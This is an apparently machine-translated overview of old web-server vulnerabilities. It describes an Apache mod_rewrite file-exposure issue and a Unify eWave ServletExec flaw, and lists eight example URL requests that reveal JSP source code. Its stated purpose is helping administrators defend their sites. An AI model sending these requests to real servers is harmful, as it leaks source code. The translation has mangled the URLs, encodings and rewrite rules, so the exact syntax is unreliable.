JSP vulnerability Overview (1)

Summary: Server Vulnerabilities are the origin of security issues, and most of the attacks by hackers against websites begin with finding vulnerabilities of the other party. Therefore, website administrators can take appropriate measures to prevent external attacks only by understanding their vulnerabilities. The following describes common vulnerabilities on some servers (including Web servers and JSP servers.
What is the vulnerability in Apache that exposes and overwrites arbitrary files?
There is a mod_rewrite module in Apache1.2 and later versions, which is used to specify the absolute path mapped by the special URLS on the Network Server File System. If an rewrite rule containing correct parameters is transmitted, attackers can view arbitrary files on the target host.
The following is an example of rewriting rule commands (the first line only contains vulnerabilities ):
RewriteRule/test/(. *)/usr/local/data/test-stuff/$1
RewriteRule/more-icons/(. *)/icons/$1
RewriteRule/go/(. *) http://www.apacheweek.com/#1
Affected Systems:
1) Apache 1.3.12
2) Apache 1.3.11win32
3) Apache 1.2.x
Unaffected systems: Apache 1.3.13
How can I expose JSP source code files by adding special characters to an HTTP request?
Unify eWave ServletExec is a Java/Java Servlet Engine plug-in for WEB servers, such as Microsoft IIS, Apache, and Netscape Enterprise Servers.
When one of the following characters is added to an HTTP request, ServletExec returns the JSP source code file.
.
% 2E
+
% 2B
　　
% 5C
% 20
% 00
Successful exploitation of this vulnerability will result in leakage of the source code of the specified JSP file. For example, you can use any of the following URL requests to output the source code of the specified JSP file:
1) http: // target/directory/jsp/file. jsp.
2) http: // target/directory/jsp/file. jsp % 2E
3) http: // target/directory/jsp/file. jsp +
4) http: // target/directory/jsp/file. jsp % 2B
5) http: // target/directory/jsp/file. jsp
6) http: // target/directory/jsp/file. jsp % 5C
7) http: // target/directory/jsp/file. jsp % 20
8) http: // target/directory/jsp/file. jsp % 00
Affected Systems:
1) Unify eWave ServletExec 3.0c
2) Sun Solaris 8.0
3) Microsoft Windows 98
4) Microsoft Windows NT 4.0
5) Microsoft Windows NT 2000
6) Linux kernel 2.3.x